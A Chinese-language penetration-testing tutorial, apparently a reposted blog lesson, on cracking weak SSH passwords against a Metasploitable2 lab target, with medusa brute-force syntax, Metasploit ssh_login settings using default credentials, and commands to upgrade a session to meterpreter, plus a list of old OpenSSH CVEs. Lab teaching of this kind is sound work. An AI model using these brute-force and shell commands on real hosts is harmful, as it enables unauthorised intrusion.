当前位置:   article > 正文

4.4、漏洞利用-SSH弱口令破解_ssh弱口令漏洞

ssh弱口令漏洞

目录

4.4、SSH弱口令破解

1、medusa SSH弱口令破解

2、ssh命令行工具登录

3、利用metasploit利用ssh登录反弹shell

4、利用metasploit获取meterpreter shell

5、SSH历史相关漏洞


4.4、SSH弱口令破解

1、medusa SSH弱口令破解

medusa(美杜莎)工具

        medusa支持破解的服务类型包括以下类型

medusa -d  //查看medusa支持破解的服务

6f4a245272314635887d3af793950da2.png

 查看语法

medusa -h host(-H file)-u username (-U userfile) -p password (-P passfile) -C file -M module

161b6a0b8c0c4efc8572da3fa41a6707.png

破解原理:ssh服务用户名和密码弱口令

攻击机:kali 192.168.12.128

靶机:metasploitable2 192.168.12.129

  1. medusa -h 192.168.xx.xx -u msfadmin -p msfadmin -M ssh
  2. 注释:-h,指定目标主机;-u,用户名;-U,用户字典;
  3. -p,密码;-P,密码字典;-M指定破解服务类型

2fcd4677691241f888f56d170a7ba65f.png

2、ssh命令行工具登录

  ssh 用户名@IP地址

  输入密码即可登录

3、利用metasploit利用ssh登录反弹shell

  1. 攻击机:kali ip=192.168.12.128
  2. 靶机:metasploitable2、IP=192.168.12.129

使用metasploit进行ssh登录,会自动建立对应的bash shell连接。

  1. use auxiliary/scanner/ssh/ssh_login //使用模块
  2. show options //查看参数

c837dd57957641d8bd3967128bc9afba.png

  1. set rhosts 192.168.12.129
  2. set username msfadmin
  3. set password msfadmin
  4. run
  5. //设置参数

5e858248f52d43c3ade886fe9268c9ef.png

sessions -l        //查看连接的会话(shell)

8d490a06413a43cf8f7ffdb0857462f3.png

sessions -i 会话id //连接会话

ed9ccf8e195b470abd73005489d8c146.png

f1215d59c0c74b6c9f187728da29d519.png

4、利用metasploit获取meterpreter shell

  利用上一步获取的bash shell,注入meterpreter payload,从而获取更强大功能的shell。

sessions -u 会话id  //注入payload

b173183c9ac944aaa801cd7215de9b6e.png

  1. sessions -l //查看
  2. sessions -i shell id //利用shell

2e98080820a64d369840bcafd9924a86.png

704273138b45418c9485c150eb555603.png

5、SSH历史相关漏洞

OpenSSH CBC模式信息泄露漏洞(CVE-2008-5161)

OpenSSH 安全漏洞(CVE-2017-15906)

OpenSSH 用户枚举漏洞(CVE-2018-15473)

OpenSSH 用户枚举漏洞(CVE-2018-15919)

OpenSSH 双重释放漏洞(CVE-2021-28041)

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/400177
推荐阅读
相关标签
  

闽ICP备14008679号